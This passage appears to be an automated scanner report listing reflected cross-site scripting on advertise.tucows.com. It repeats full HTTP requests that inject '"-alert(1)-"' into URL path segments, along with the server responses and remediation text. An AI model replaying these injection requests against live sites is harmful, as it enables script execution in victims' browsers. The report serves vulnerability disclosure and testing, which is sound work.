GET /includes/jsb36c3"-alert(1)-"b205bb5d532/signupin.js HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:27 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32525
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28622"-alert(1)-"2ff515b5d95 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js/signupin.js28622"-alert(1)-"2ff515b5d95 HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:48 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32701
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42de8"-alert(1)-"7d8ee46561 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes42de8"-alert(1)-"7d8ee46561/js/x_core.js HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:19 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32536
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b15de"-alert(1)-"e0f1f5c84c9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/jsb15de"-alert(1)-"e0f1f5c84c9/x_core.js HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:24 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32290
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd486"-alert(1)-"0da40994d37 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js/x_core.jscd486"-alert(1)-"0da40994d37 HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:36 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 33252
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fa22"-alert(1)-"0e7110e52dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes1fa22"-alert(1)-"0e7110e52dc/js/xdocsize.js HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:17 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32569
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c95d"-alert(1)-"1272630c525 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js9c95d"-alert(1)-"1272630c525/xdocsize.js HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:23 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32362
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f090"-alert(1)-"a04c13647f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js/xdocsize.js9f090"-alert(1)-"a04c13647f HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:36 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32156
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8a6f"-alert(1)-"48e3c448543 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includesb8a6f"-alert(1)-"48e3c448543/js/yetii.js HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:20 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32548
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 505a4"-alert(1)-"da5a49629e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js505a4"-alert(1)-"da5a49629e/yetii.js HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:26 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 31925
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ad87"-alert(1)-"ee3d1dab97f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js/yetii.js5ad87"-alert(1)-"ee3d1dab97f HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:38 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32018
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f637"-alert(1)-"80f9081ac8c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
